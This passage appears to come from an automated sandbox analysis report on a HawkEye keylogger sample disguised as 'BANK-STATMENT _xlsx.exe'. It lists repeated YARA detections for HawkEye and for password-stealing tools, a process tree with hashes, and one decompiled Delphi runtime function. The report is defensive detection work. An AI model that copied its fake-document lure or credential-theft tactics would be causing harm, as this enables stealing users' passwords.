                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.883042234.0000000000AD0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.885702309.0000000002F42000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.886068587.0000000003AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.886068587.0000000003AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.883478400.00000000023D2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.882401105.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 0000001D.00000002.882514988.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 6188 Parent PID: 6984

                                                                              General

                                                                              Start time:16:04:19
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 6180 5810484
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: dw20.exe PID: 5484 Parent PID: 6180

                                                                              General

                                                                              Start time:16:04:23
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2264
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 5540 Parent PID: 6188

                                                                              General

                                                                              Start time:16:04:30
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.903399921.0000000002642000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000021.00000002.903584502.00000000026D7000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 5580 Parent PID: 5540

                                                                              General

                                                                              Start time:16:04:30
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000022.00000002.915921004.0000000003032000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000022.00000002.912614884.0000000002362000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000002.915989570.0000000003038000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000022.00000001.893606211.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000022.00000002.912543574.00000000022D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000022.00000002.912719183.0000000002402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000022.00000002.911923188.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.916237371.0000000003BB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000022.00000002.916237371.0000000003BB1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000022.00000002.911809266.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 5588 Parent PID: 5540

                                                                              General

                                                                              Start time:16:04:31
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 5580 5822718
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Reputation:low

                                                                              Chronological Activities

                                                                              Analysis Process: dw20.exe PID: 6904 Parent PID: 5580

                                                                              General

                                                                              Start time:16:04:37
                                                                              Start date:19/11/2020
                                                                              Path:C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:dw20.exe -x -s 2324
                                                                              Imagebase:0x10000000
                                                                              File size:33936 bytes
                                                                              MD5 hash:8D10DA8A3E11747E51F23C882C22BBC3
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 6176 Parent PID: 5588

                                                                              General

                                                                              Start time:16:04:43
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000025.00000002.926331050.0000000002857000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000025.00000002.926178784.00000000027C2000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 2864 Parent PID: 6176

                                                                              General

                                                                              Start time:16:04:44
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:.Net C# or VB.NET
                                                                              Yara matches:
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000002.928753119.0000000000497000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000002.928377317.0000000000402000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.932841604.0000000002F34000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000002.932841604.0000000002F34000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000002.933151800.0000000003AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000002.933151800.0000000003AC1000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000001.923369049.00000000004D2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000002.930718312.00000000022C2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000002.930882020.0000000002352000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: RAT_HawkEye, Description: Detects HawkEye RAT, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                              • Rule: JoeSecurity_MailPassView, Description: Yara detected MailPassView, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_WebBrowserPassView, Description: Yara detected WebBrowserPassView password recovery tool, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: Joe Security
                                                                              • Rule: Hawkeye, Description: detect HawkEye in memory, Source: 00000026.00000002.930539943.0000000002230000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                              • Rule: JoeSecurity_HawkEye, Description: Yara detected HawkEye Keylogger, Source: 00000026.00000002.932871258.0000000002F3A000.00000004.00000001.sdmp, Author: Joe Security

                                                                              Chronological Activities

                                                                              Analysis Process: BANK-STATMENT _xlsx.exe PID: 4608 Parent PID: 6176

                                                                              General

                                                                              Start time:16:04:45
                                                                              Start date:19/11/2020
                                                                              Path:C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:'C:\Users\user\Desktop\BANK-STATMENT _xlsx.exe' 2 2864 5836578
                                                                              Imagebase:0x400000
                                                                              File size:965120 bytes
                                                                              MD5 hash:DEBE564CD4C27C02D23C828DF27FE27F
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:Borland Delphi

                                                                              Chronological Activities

                                                                              Disassembly

                                                                              Code Analysis

                                                                              Reset < >

                                                                                Analysis Process: BANK-STATMENT _xlsx.exe PID: 1496 Parent PID: 5864 BANK-STATMENT _xlsx.exeCOMMON

                                                                                Executed Functions

                                                                                Function 00405C78, Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 184registrystringlibraryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 65%
                                                                                			E00405C78(intOrPtr __eax) {
				intOrPtr _v8;
				void* _v12;
				char _v15;
				char _v17;
				char _v18;
				char _v22;
				int _v28;
				char _v289;
				long _t44;
				long _t61;
				long _t63;
				CHAR* _t70;
				CHAR* _t72;
				struct HINSTANCE__* _t78;
				struct HINSTANCE__* _t84;
				char* _t94;
				void* _t95;
				intOrPtr _t99;
				struct HINSTANCE__* _t107;
				void* _t110;
				void* _t112;
				intOrPtr _t113;

				_t110 = _t112;
				_t113 = _t112 + 0xfffffee0;
				_v8 = __eax;
				GetModuleFileNameA(0,  &_v289, 0x105);
				_v22 = 0;
				_t44 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
				if(_t44 == 0) {
					L3:
					_push(_t110);
					_push(0x405d7d);
					_push( *[fs:eax]);
					 *[fs:eax] = _t113;
					_v28 = 5;
					E00405AC0( &_v289, 0x105);
					if(RegQueryValueExA(_v12,  &_v289, 0, 0,  &_v22,  &_v28) != 0 && RegQueryValueExA(_v12, E00405EE4, 0, 0,  &_v22,  &_v28) != 0) {
						_v22 = 0;
					}
					_v18 = 0;
					_pop(_t99);
					 *[fs:eax] = _t99;
					_push(E00405D84);
					return RegCloseKey(_v12);
				} else {
					_t61 = RegOpenKeyExA(0x80000002, "Software\\Borland\\Locales", 0, 0xf0019,  &_v12); // executed
					if(_t61 == 0) {
						goto L3;
					} else {
						_t63 = RegOpenKeyExA(0x80000001, "Software\\Borland\\Delphi\\Locales", 0, 0xf0019,  &_v12); // executed
						if(_t63 != 0) {
							_push(0x105);
							_push(_v8);
							_push( &_v289);
							L00401310();
							GetLocaleInfoA(GetThreadLocale(), 3,  &_v17, 5); // executed
							_t107 = 0;
							if(_v289 != 0 && (_v17 != 0 || _v22 != 0)) {
								_t70 =  &_v289;
								_push(_t70);
								L00401318();
								_t94 = _t70 +  &_v289;
								while( *_t94 != 0x2e && _t94 !=  &_v289) {
									_t94 = _t94 - 1;
								}
								_t72 =  &_v289;
								if(_t94 != _t72) {
									_t95 = _t94 + 1;
									if(_v22 != 0) {
										_push(0x105 - _t95 - _t72);
										_push( &_v22);
										_push(_t95);
										L00401310();
										_t107 = LoadLibraryExA( &_v289, 0, 2);
									}
									if(_t107 == 0 && _v17 != 0) {
										_push(0x105 - _t95 -  &_v289);
										_push( &_v17);
										_push(_t95);
										L00401310();
										_t78 = LoadLibraryExA( &_v289, 0, 2); // executed
										_t107 = _t78;
										if(_t107 == 0) {
											_v15 = 0;
											_push(0x105 - _t95 -  &_v289);
											_push( &_v17);
											_push(_t95);
											L00401310();
											_t84 = LoadLibraryExA( &_v289, 0, 2); // executed
											_t107 = _t84;
										}
									}
								}
							}
							return _t107;
						} else {
							goto L3;
						}
					}
				}
			}

























                                                                                0x00405c79
                                                                                0x00405c7b
                                                                                0x00405c83
                                                                                0x00405c94
                                                                                0x00405c99
                                                                                0x00405cb2
                                                                                0x00405cb9
                                                                                0x00405cfb
                                                                                0x00405cfd
                                                                                0x00405cfe
                                                                                0x00405d03
                                                                                0x00405d06
                                                                                0x00405d09
                                                                                0x00405d1b
                                                                                0x00405d3e
                                                                                0x00405d5e
                                                                                0x00405d5e
                                                                                0x00405d62
                                                                                0x00405d68
                                                                                0x00405d6b
                                                                                0x00405d6e
                                                                                0x00405d7c
                                                                                0x00405cbb
                                                                                0x00405cd0
                                                                                0x00405cd7
                                                                                0x00000000
                                                                                0x00405cd9
                                                                                0x00405cee
                                                                                0x00405cf5
                                                                                0x00405d84
                                                                                0x00405d8c
                                                                                0x00405d93
                                                                                0x00405d94
                                                                                0x00405da7
                                                                                0x00405dac
                                                                                0x00405db5
                                                                                0x00405dcb
                                                                                0x00405dd1
                                                                                0x00405dd2
